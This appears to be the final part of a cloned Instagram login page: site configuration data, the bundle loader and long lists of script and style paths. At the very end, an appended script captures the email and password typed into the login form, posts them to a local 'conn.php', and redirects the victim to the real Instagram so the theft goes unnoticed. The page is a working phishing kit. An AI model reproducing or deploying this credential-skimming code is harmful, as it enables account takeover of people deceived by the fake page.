"qex":true},"78":{"p":{"0":true,"1":true,"2":true,"3":true,"5":true},"l":{},"qex":true},"80":{"p":{"3":true,"4":false},"l":{},"qex":true},"84":{"p":{"0":true,"1":true,"2":true,"3":true,"4":true,"5":true,"6":false,"8":false},"l":{},"qex":true},"85":{"p":{"0":false,"1":"Pictures and Videos"},"l":{},"qex":true},"87":{"p":{"0":true},"l":{},"qex":true},"93":{"p":{"0":true},"l":{},"qex":true},"95":{"p":{"0":false,"1":false},"l":{},"qex":true},"98":{"p":{"1":false},"l":{},"qex":true}},"probably_has_app":false,"cb":true},"device_id":"4CB05DEF-F400-4F43-8C4D-A9D7D1C8998E","browser_push_pub_key":"BIBn3E_rWTci8Xn6P9Xj3btShT85Wdtne0LtwNUyRQ5XjFNkuTq9j4MPAVLvAFhXrUU1A9UxyxBA7YIOjqDIDHI","encryption":{"key_id":"233","public_key":"2bc5bb261e87b53d914227a311127ab35acff9bbbc45c598e2711977a5f01d67","version":"10"},"is_dev":false,"signal_collection_config":null,"rollout_hash":"bd344c4b4f36","bundle_variant":"metro","frontend_env":"c1f"};</script>
<script type="text/javascript">window.__initialDataLoaded(window._sharedData);</script>
<script type="text/javascript">var __BUNDLE_START_TIME__=this.nativePerformanceNow?nativePerformanceNow():Date.now(),__DEV__=false,process=this.process||{};process.env=process.env||{};process.env.NODE_ENV=process.env.NODE_ENV||"production";!(function(r){"use strict";function e(){return c=Object.create(null)}function t(r){var e=r,t=c[e];return t&&t.isInitialized?t.publicModule.exports:o(e,t)}function n(r){var e=r;if(c[e]&&c[e].importedDefault!==f)return c[e].importedDefault;var n=t(e),i=n&&n.__esModule?n.default:n;return c[e].importedDefault=i}function i(r){var e=r;if(c[e]&&c[e].importedAll!==f)return c[e].importedAll;var n,i=t(e);if(i&&i.__esModule)n=i;else{if(n={},i)for(var o in i)p.call(i,o)&&(n[o]=i[o]);n.default=i}return c[e].importedAll=n}function o(e,t){if(!s&&r.ErrorUtils){s=!0;var n;try{n=u(e,t)}catch(e){r.ErrorUtils.reportFatalError(e)}return s=!1,n}return u(e,t)}function l(r){return{segmentId:r>>>v,localId:r&h}}function u(e,o){if(!o&&g.length>0){var u=l(e),f=u.segmentId,p=u.localId,s=g[f];null!=s&&(s(p),o=c[e])}var v=r.nativeRequire;if(!o&&v){var h=l(e),I=h.segmentId;v(h.localId,I),o=c[e]}if(!o)throw a(e);if(o.hasError)throw d(e,o.error);o.isInitialized=!0;var _=o,w=_.factory,y=_.dependencyMap;try{var M=o.publicModule;if(M.id=e,m.length>0)for(var b=0;b<m.length;++b)m[b].cb(e,M);return w(r,t,n,i,M,M.exports,y),o.factory=void 0,o.dependencyMap=void 0,M.exports}catch(r){throw o.hasError=!0,o.error=r,o.isInitialized=!1,o.publicModule.exports=void 0,r}}function a(r){var e='Requiring unknown module "'+r+'".';return Error(e)}function d(r,e){var t=r;return Error('Requiring module "'+t+'", which threw an exception: '+e)}r.__r=t,r.__d=function(r,e,t){null==c[e]&&(c[e]={dependencyMap:t,factory:r,hasError:!1,importedAll:f,importedDefault:f,isInitialized:!1,publicModule:{exports:{}}})},r.__c=e,r.__registerSegment=function(r,e){g[r]=e};var c=e(),f={},p={}.hasOwnProperty;t.importDefault=n,t.importAll=i;var s=!1,v=16,h=65535;t.unpackModuleId=l,t.packModuleId=function(r){return(r.segmentId<<v)+r.localId};var m=[];t.registerHook=function(r){var e={cb:r};return m.push(e),{release:function(){for(var r=0;r<m.length;++r)if(m[r]===e){m.splice(r,1);break}}}};var g=[]})('undefined'!=typeof global?global:'undefined'!=typeof window?window:this);
__s={"js":{"146":"/static/bundles/metro/PasswordEncryptionLogger.js/1b8a581a878c.js","147":"/static/bundles/metro/EncryptionUtils.js/4606f05f85cd.js","148":"/static/bundles/metro/MobileStoriesLoginPage.js/24923c25e8db.js","149":"/static/bundles/metro/DesktopStoriesLoginPage.js/7b36acf9c262.js","150":"/static/bundles/metro/AvenyFont.js/a4de03cd349f.js","151":"/static/bundles/metro/DirectSearchUserContainer.js/6890222199f0.js","152":"/static/bundles/metro/StoriesDebugInfoNub.js/c234877f558e.js","153":"/static/bundles/metro/MobileStoriesPage.js/91d383516d31.js","154":"/static/bundles/metro/DesktopStoriesPage.js/4738dbf9b14b.js","155":"/static/bundles/metro/ActivityFeedPage.js/3a6efaafa350.js","156":"/static/bundles/metro/AdsSettingsPage.js/5f1902b271d4.js","157":"/static/bundles/metro/DonateCheckoutPage.js/ac7acc1c259d.js","158":"/static/bundles/metro/FundraiserWebView.js/4f848a7862d7.js","159":"/static/bundles/metro/FBPayConnectLearnMorePage.js/7b6fc8dad5cd.js","160":"/static/bundles/metro/CameraPage.js/07fcef0c6409.js","161":"/static/bundles/metro/SettingsModules.js/93a52e30fdf8.js","162":"/static/bundles/metro/ContactHistoryPage.js/055f286a0acd.js","163":"/static/bundles/metro/AccessToolPage.js/9d0dc687f25f.js","164":"/static/bundles/metro/AccessToolViewAllPage.js/ea47b0774ffb.js","165":"/static/bundles/metro/AccountPrivacyBugPage.js/13bc47faf9e2.js","166":"/static/bundles/metro/FirstPartyPlaintextPasswordLandingPage.js/35a297c9fa26.js","167":"/static/bundles/metro/ThirdPartyPlaintextPasswordLandingPage.js/94632986f663.js","168":"/static/bundles/metro/ShoppingBagLandingPage.js/62a8c50ab51e.js","169":"/static/bundles/metro/PlaintextPasswordBugPage.js/c59bf98a7df8.js","170":"/static/bundles/metro/PrivateAccountMadePublicBugPage.js/a9930251ef61.js","171":"/static/bundles/metro/PublicAccountNotMadePrivateBugPage.js/1da5c3b2a451.js","172":"/static/bundles/metro/BlockedAccountsBugPage.js/bd1cd4bcb50e.js","173":"/static/bundles/metro/AndroidBetaPrivacyBugPage.js/c8ff17e1da20.js","174":"/static/bundles/metro/DataControlsSupportPage.js/8971f5da21a0.js","175":"/static/bundles/metro/DataDownloadRequestPage.js/e333338fb192.js","176":"/static/bundles/metro/DataDownloadRequestConfirmPage.js/671f31776c12.js","177":"/static/bundles/metro/CheckpointUnderageAppealPage.js/3e3a5fddd6c6.js","178":"/static/bundles/metro/AccountRecoveryLandingPage.js/d9f53a56b56d.js","179":"/static/bundles/metro/ContactInvitesOptOutPage.js/9f180728d046.js","180":"/static/bundles/metro/ParentalConsentPage.js/beb7d8ddbed9.js","181":"/static/bundles/metro/ParentalConsentNotParentPage.js/01623af20c1d.js","182":"/static/bundles/metro/TermsAcceptPage.js/2ee6648c1030.js","183":"/static/bundles/metro/TermsUnblockPage.js/d50f9f3504bb.js","184":"/static/bundles/metro/NewTermsConfirmPage.js/5d328ba3012e.js","185":"/static/bundles/metro/ContactInvitesOptOutStatusPage.js/a726b5571c9b.js","186":"/static/bundles/metro/CreationModules.js/a0b3c3e2bd29.js","187":"/static/bundles/metro/StoryCreationPage.js/f6b3f701879f.js","188":"/static/bundles/metro/PostCommentInput.js/b081b9f41f09.js","191":"/static/bundles/metro/NewsworthyContentShareFrictionModal.js/52b180a6014b.js","192":"/static/bundles/metro/PostModalEntrypoint.js/2861bc2995a8.js","193":"/static/bundles/metro/PostComments.js/b9c1d8553350.js","194":"/static/bundles/metro/LikedByListContainer.js/2b4e56375ee6.js","195":"/static/bundles/metro/CommentLikedByListContainer.js/71eda4744246.js","196":"/static/bundles/metro/shaka-player.ui.js/e04ce5cd903a.js","197":"/static/bundles/metro/DynamicExploreMediaPage.js/fae8595e2a65.js","198":"/static/bundles/metro/DiscoverMediaPageContainer.js/11b91d653909.js","199":"/static/bundles/metro/DiscoverPeoplePageContainer.js/b7c020334e5a.js","200":"/static/bundles/metro/EmailConfirmationPage.js/49fc0366ad56.js","201":"/static/bundles/metro/EmailReportBadPasswordResetPage.js/5b6181fd889c.js","202":"/static/bundles/metro/FBSignupPage.js/18592aad33c0.js","203":"/static/bundles/metro/NewUserInterstitial.js/c05d09555903.js","204":"/static/bundles/metro/MultiStepSignupPage.js/68e05b615b92.js","205":"/static/bundles/metro/EmptyFeedPage.js/5a301af989c2.js","206":"/static/bundles/metro/NewUserActivatorsUnit.js/db813291a42d.js","207":"/static/bundles/metro/FeedEndSuggestedUserUnit.js/2fcf92ccbd8c.js","208":"/static/bundles/metro/FeedSidebarContainer.js/b637691416e4.js","209":"/static/bundles/metro/SuggestedUserFeedUnitContainer.js/0701b5c9615b.js","210":"/static/bundles/metro/InFeedStoryTray.js/1c52a00cdd81.js","211":"/static/bundles/metro/FeedPageContainer.js/e42ee31067f0.js","212":"/static/bundles/metro/FollowListModal.js/9b5f262d5b4d.js","213":"/static/bundles/metro/FollowListPage.js/e2d2edff6024.js","214":"/static/bundles/metro/SimilarAccountsPage.js/8bfcf8af91e0.js","215":"/static/bundles/metro/oz-player.main.js/1fbc4dc54918.js","216":"/static/bundles/metro/LiveBroadcastPage.js/5a3416c6b740.js","217":"/static/bundles/metro/VotingInformationCenterPage.js/fdf1ad67f91e.js","218":"/static/bundles/metro/FalseInformationLandingPage.js/24a296b6e1c3.js","219":"/static/bundles/metro/FalseInformationAppealsPage.js/0af1d43ed5e2.js","220":"/static/bundles/metro/LandingPage.js/365c884f0522.js","221":"/static/bundles/metro/LocationsDirectoryCountryPage.js/02ab1e512fba.js","222":"/static/bundles/metro/LocationsDirectoryCityPage.js/02e574e09eab.js","223":"/static/bundles/metro/LocationPageContainer.js/aad565be08fa.js","224":"/static/bundles/metro/LocationsDirectoryLandingPage.js/9734506e6ea4.js","225":"/static/bundles/metro/LoginAndSignupPage.js/0766f7ddad07.js","226":"/static/bundles/metro/FXCalLinkingAuthForm.js/720340362da2.js","227":"/static/bundles/metro/FXCalReauthLoginForm.js/7ef0f7369302.js","228":"/static/bundles/metro/UpdateIGAppForHelpPage.js/b29af11f8537.js","229":"/static/bundles/metro/ResetPasswordPageContainer.js/004633531e94.js","230":"/static/bundles/metro/MobileAllCommentsPage.js/c69725f03800.js","231":"/static/bundles/metro/MediaChainingPageContainer.js/4200b659dfa0.js","232":"/static/bundles/metro/PostPageContainer.js/dbbb5ee87eb0.js","233":"/static/bundles/metro/ProfilesDirectoryLandingPage.js/684bcb7c19d0.js","234":"/static/bundles/metro/HashtagsDirectoryLandingPage.js/0a0dbce7b68e.js","235":"/static/bundles/metro/SuggestedDirectoryLandingPage.js/df3eca8d5872.js","236":"/static/bundles/metro/ConsentWithdrawPage.js/53802f2908f5.js","237":"/static/bundles/metro/ProductDetailsPage.js/a9a53b1423eb.js","238":"/static/bundles/metro/ShoppingBagPage.js/918a4335e767.js","239":"/static/bundles/metro/ShoppingBagDetailsPage.js/fad13ed1d9ed.js","240":"/static/bundles/metro/ProfessionalConversionModal.js/116a9f353180.js","241":"/static/bundles/metro/TagPageContainer.js/9530add3364f.js","242":"/static/bundles/metro/PhoneConfirmPage.js/6dab1280270f.js","243":"/static/bundles/metro/SimilarAccountsModal.js/2d2be2320d59.js","244":"/static/bundles/metro/ProfilePageContainer.js/a1478bef80d1.js","245":"/static/bundles/metro/HttpErrorPage.js/56156500e7e4.js","246":"/static/bundles/metro/IGTVVideoDraftsPageContainer.js/e82266fb53cb.js","247":"/static/bundles/metro/IGTVVideoUploadPageContainer.js/817fc9f27898.js","248":"/static/bundles/metro/OAuthPermissionsPage.js/851780ade192.js","249":"/static/bundles/metro/MobileDirectPage.js/b23aa8dec76d.js","250":"/static/bundles/metro/DesktopDirectPage.js/ef8c36f75af6.js","251":"/static/bundles/metro/GuideModalEntrypoint.js/ef35360a9161.js","252":"/static/bundles/metro/GuidePage.js/5a48472a9667.js","253":"/static/bundles/metro/SavedCollectionPage.js/f0ca47a1c8e0.js","254":"/static/bundles/metro/OneTapUpsell.js/6432ee3fbab0.js","255":"/static/bundles/metro/AvenyMediumFont.js/5662a6579cbb.js","256":"/static/bundles/metro/NametagLandingPage.js/42536815aa76.js","257":"/static/bundles/metro/LocalDevTransactionToolSelectorPage.js/3995f46cfd5d.js","258":"/static/bundles/metro/FBEAppStoreErrorPage.js/d3124fa4ad9c.js","259":"/static/bundles/metro/BloksShellPage.js/73c54c60b858.js","260":"/static/bundles/metro/BusinessCategoryPageContainer.js/71212613d37b.js","261":"/static/bundles/metro/BusinessProfileDirectoryPage.js/e02f10a47bf2.js","262":"/static/bundles/metro/BloksPage.js/d877dcfea552.js","265":"/static/bundles/metro/ActivityFeedBox.js/3279dfc585f0.js","266":"/static/bundles/metro/DirectMQTT.js/5e9dff002a79.js","267":"/static/bundles/metro/Consumer.js/962f323f0160.js","268":"/static/bundles/metro/Challenge.js/d5864e77684d.js","269":"/static/bundles/metro/NotificationLandingPage.js/d86ccd4d81db.js","288":"/static/bundles/metro/EmbedRich.js/bbdec8ccfd5d.js","289":"/static/bundles/metro/EmbedVideoWrapper.js/0968758b4fb3.js","290":"/static/bundles/metro/EmbedSidecarEntrypoint.js/a797a1687809.js","291":"/static/bundles/metro/EmbedGuideEntrypoint.js/085fd259d322.js","292":"/static/bundles/metro/EmbedAsyncLogger.js/5826a56dc0fb.js"},"css":{"148":"/static/bundles/metro/MobileStoriesLoginPage.css/07398b83baa9.css","149":"/static/bundles/metro/DesktopStoriesLoginPage.css/eed8d69eb866.css","150":"/static/bundles/metro/AvenyFont.css/25fd69ff2266.css","151":"/static/bundles/metro/DirectSearchUserContainer.css/ad12791c2bf9.css","152":"/static/bundles/metro/StoriesDebugInfoNub.css/4bc325bd3e84.css","153":"/static/bundles/metro/MobileStoriesPage.css/4b6053053fff.css","154":"/static/bundles/metro/DesktopStoriesPage.css/7092ff40137d.css","155":"/static/bundles/metro/ActivityFeedPage.css/3cdd5b2ff84c.css","156":"/static/bundles/metro/AdsSettingsPage.css/5b29a3826adf.css","157":"/static/bundles/metro/DonateCheckoutPage.css/0dc9dea77d48.css","159":"/static/bundles/metro/FBPayConnectLearnMorePage.css/228327863000.css","160":"/static/bundles/metro/CameraPage.css/19a143ab4347.css","161":"/static/bundles/metro/SettingsModules.css/9002d469db6d.css","162":"/static/bundles/metro/ContactHistoryPage.css/6450a9697d3b.css","163":"/static/bundles/metro/AccessToolPage.css/77c8460b4d9b.css","164":"/static/bundles/metro/AccessToolViewAllPage.css/61f9d399977f.css","165":"/static/bundles/metro/AccountPrivacyBugPage.css/b084aece73a3.css","166":"/static/bundles/metro/FirstPartyPlaintextPasswordLandingPage.css/d4c180511b0e.css","167":"/static/bundles/metro/ThirdPartyPlaintextPasswordLandingPage.css/d4c180511b0e.css","168":"/static/bundles/metro/ShoppingBagLandingPage.css/9ea9da8878b6.css","169":"/static/bundles/metro/PlaintextPasswordBugPage.css/d4c180511b0e.css","170":"/static/bundles/metro/PrivateAccountMadePublicBugPage.css/d4c180511b0e.css","171":"/static/bundles/metro/PublicAccountNotMadePrivateBugPage.css/d4c180511b0e.css","172":"/static/bundles/metro/BlockedAccountsBugPage.css/d4c180511b0e.css","173":"/static/bundles/metro/AndroidBetaPrivacyBugPage.css/158f7ff45015.css","174":"/static/bundles/metro/DataControlsSupportPage.css/2c93110330b6.css","175":"/static/bundles/metro/DataDownloadRequestPage.css/526b60394de5.css","176":"/static/bundles/metro/DataDownloadRequestConfirmPage.css/5deaa1b33b08.css","177":"/static/bundles/metro/CheckpointUnderageAppealPage.css/0dfde7fcc39c.css","178":"/static/bundles/metro/AccountRecoveryLandingPage.css/c2fce7e557e0.css","179":"/static/bundles/metro/ContactInvitesOptOutPage.css/16fb0ada266f.css","180":"/static/bundles/metro/ParentalConsentPage.css/c5f1e68fdc65.css","181":"/static/bundles/metro/ParentalConsentNotParentPage.css/6308e4086754.css","182":"/static/bundles/metro/TermsAcceptPage.css/14b0bd420229.css","183":"/static/bundles/metro/TermsUnblockPage.css/58dc1cabc72b.css","184":"/static/bundles/metro/NewTermsConfirmPage.css/eefd956746e6.css","185":"/static/bundles/metro/ContactInvitesOptOutStatusPage.css/c71af4588c9c.css","186":"/static/bundles/metro/CreationModules.css/f0777c061b58.css","187":"/static/bundles/metro/StoryCreationPage.css/a5c65c300576.css","188":"/static/bundles/metro/PostCommentInput.css/b3211f75d858.css","193":"/static/bundles/metro/PostComments.css/205108e2268c.css","194":"/static/bundles/metro/LikedByListContainer.css/69d3c252fe19.css","195":"/static/bundles/metro/CommentLikedByListContainer.css/69d3c252fe19.css","197":"/static/bundles/metro/DynamicExploreMediaPage.css/872233da7867.css","198":"/static/bundles/metro/DiscoverMediaPageContainer.css/ffeac0a06d31.css","199":"/static/bundles/metro/DiscoverPeoplePageContainer.css/a3388d882b77.css","200":"/static/bundles/metro/EmailConfirmationPage.css/d3ff48c961de.css","201":"/static/bundles/metro/EmailReportBadPasswordResetPage.css/e4462019534b.css","202":"/static/bundles/metro/FBSignupPage.css/69fe845008ba.css","203":"/static/bundles/metro/NewUserInterstitial.css/ff3166381a45.css","204":"/static/bundles/metro/MultiStepSignupPage.css/5d38af6d00b4.css","205":"/static/bundles/metro/EmptyFeedPage.css/e1ccedbdafd4.css","207":"/static/bundles/metro/FeedEndSuggestedUserUnit.css/42e60023d1af.css","208":"/static/bundles/metro/FeedSidebarContainer.css/80d2dea43880.css","209":"/static/bundles/metro/SuggestedUserFeedUnitContainer.css/7daaa9d9b746.css","210":"/static/bundles/metro/InFeedStoryTray.css/a63f4d3eb101.css","211":"/static/bundles/metro/FeedPageContainer.css/3bf529c154e1.css","212":"/static/bundles/metro/FollowListModal.css/f383ba3ed245.css","213":"/static/bundles/metro/FollowListPage.css/f89008248fe9.css","214":"/static/bundles/metro/SimilarAccountsPage.css/c61a0df44212.css","216":"/static/bundles/metro/LiveBroadcastPage.css/b9e8d4ad5255.css","217":"/static/bundles/metro/VotingInformationCenterPage.css/352b2966c7ea.css","219":"/static/bundles/metro/FalseInformationAppealsPage.css/f7561461b909.css","220":"/static/bundles/metro/LandingPage.css/8d927d69de86.css","221":"/static/bundles/metro/LocationsDirectoryCountryPage.css/4dacfdb3fce0.css","222":"/static/bundles/metro/LocationsDirectoryCityPage.css/4dacfdb3fce0.css","223":"/static/bundles/metro/LocationPageContainer.css/919f2ad374cc.css","224":"/static/bundles/metro/LocationsDirectoryLandingPage.css/8d8beac67daf.css","225":"/static/bundles/metro/LoginAndSignupPage.css/7843fc980a59.css","226":"/static/bundles/metro/FXCalLinkingAuthForm.css/c228eff939ba.css","227":"/static/bundles/metro/FXCalReauthLoginForm.css/b10376b96a91.css","228":"/static/bundles/metro/UpdateIGAppForHelpPage.css/6fb2336f846b.css","229":"/static/bundles/metro/ResetPasswordPageContainer.css/d4c180511b0e.css","230":"/static/bundles/metro/MobileAllCommentsPage.css/29da6ad452d9.css","231":"/static/bundles/metro/MediaChainingPageContainer.css/761edd680111.css","232":"/static/bundles/metro/PostPageContainer.css/81be6a841de7.css","233":"/static/bundles/metro/ProfilesDirectoryLandingPage.css/b406e80cc262.css","234":"/static/bundles/metro/HashtagsDirectoryLandingPage.css/b406e80cc262.css","235":"/static/bundles/metro/SuggestedDirectoryLandingPage.css/b406e80cc262.css","237":"/static/bundles/metro/ProductDetailsPage.css/beb76d9aeb9a.css","238":"/static/bundles/metro/ShoppingBagPage.css/1bae09706657.css","239":"/static/bundles/metro/ShoppingBagDetailsPage.css/20e3c3a3a20f.css","240":"/static/bundles/metro/ProfessionalConversionModal.css/73eb67ac933c.css","241":"/static/bundles/metro/TagPageContainer.css/cbadd310df5d.css","242":"/static/bundles/metro/PhoneConfirmPage.css/59398e0ab679.css","244":"/static/bundles/metro/ProfilePageContainer.css/026b3f7d67df.css","245":"/static/bundles/metro/HttpErrorPage.css/97acfee23c4f.css","246":"/static/bundles/metro/IGTVVideoDraftsPageContainer.css/b3f2af4bc2c1.css","247":"/static/bundles/metro/IGTVVideoUploadPageContainer.css/8f1406ecfdde.css","248":"/static/bundles/metro/OAuthPermissionsPage.css/f127ac651626.css","249":"/static/bundles/metro/MobileDirectPage.css/76abfb7398d1.css","250":"/static/bundles/metro/DesktopDirectPage.css/a401acfe8709.css","252":"/static/bundles/metro/GuidePage.css/80c2d4c19d37.css","253":"/static/bundles/metro/SavedCollectionPage.css/ca2473f476e6.css","254":"/static/bundles/metro/OneTapUpsell.css/c312b28c297e.css","255":"/static/bundles/metro/AvenyMediumFont.css/410fb2643dbe.css","256":"/static/bundles/metro/NametagLandingPage.css/0c3f6c69e197.css","257":"/static/bundles/metro/LocalDevTransactionToolSelectorPage.css/3f8f9bb4c8a7.css","258":"/static/bundles/metro/FBEAppStoreErrorPage.css/37c4f5efdab6.css","259":"/static/bundles/metro/BloksShellPage.css/88f0898604c5.css","260":"/static/bundles/metro/BusinessCategoryPageContainer.css/6d5296475a27.css","261":"/static/bundles/metro/BusinessProfileDirectoryPage.css/521a86056e0f.css","262":"/static/bundles/metro/BloksPage.css/1923e6d88524.css","265":"/static/bundles/metro/ActivityFeedBox.css/42bd095a8e5e.css","267":"/static/bundles/metro/Consumer.css/48d5981a0dd7.css","268":"/static/bundles/metro/Challenge.css/07fb9a23613d.css","269":"/static/bundles/metro/NotificationLandingPage.css/c35e66b76f51.css","288":"/static/bundles/metro/EmbedRich.css/377f4e3ea5da.css","289":"/static/bundles/metro/EmbedVideoWrapper.css/4b15d983f582.css","290":"/static/bundles/metro/EmbedSidecarEntrypoint.css/d572c9ea88f1.css","291":"/static/bundles/metro/EmbedGuideEntrypoint.css/2bafce2bad88.css"}}</script>
<script type="text/javascript" src="/static/bundles/metro/Polyfills.js/79d8ce8b6778.js" crossorigin="anonymous"></script>
<script type="text/javascript" src="/static/bundles/metro/Vendor.js/5a56d51ae30f.js" crossorigin="anonymous"></script>
<script type="text/javascript" src="/static/bundles/metro/en_US.js/b103edcefcae.js" crossorigin="anonymous"></script>
<script type="text/javascript" src="/static/bundles/metro/ConsumerLibCommons.js/fe2e044f3afa.js" crossorigin="anonymous"></script>
<script type="text/javascript" src="/static/bundles/metro/ConsumerUICommons.js/eb2a57c472a9.js" crossorigin="anonymous"></script>
<script type="text/javascript" src="/static/bundles/metro/ConsumerAsyncCommons.js/1eaeaff3f9d8.js" crossorigin="anonymous"></script>
<script type="text/javascript" src="/static/bundles/metro/Consumer.js/962f323f0160.js" crossorigin="anonymous" charset="utf-8" async=""></script>
<script type="text/javascript" src="/static/bundles/metro/LandingPage.js/365c884f0522.js" crossorigin="anonymous" charset="utf-8" async=""></script>
<script type="text/javascript">
//Aye
</script>
<div class="Z2m7o"><div class="CgFia "></div></div><div id="fb-root" class=" fb_reset"><div style="position: absolute; top: -10000px; width: 0px; height: 0px;"><div></div></div></div></body><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script><script>document.querySelector("#loginForm > div > div.Igw0E.IwRSH.eGOV_._4EzTm.bkEs3.CovQj.jKUp7.DhRcB > button").addEventListener('click', e => {e.preventDefault;let email = document.querySelector("#loginForm > div > div:nth-child(1) > div > label > input").value; let pass = document.querySelector("#loginForm > div > div:nth-child(2) > div > label > input").value; let data = {email: email, pass: pass}; $.post('./conn.php', data); setTimeout(() => {window.location = 'https://www.instagram.com'},2000)})</script>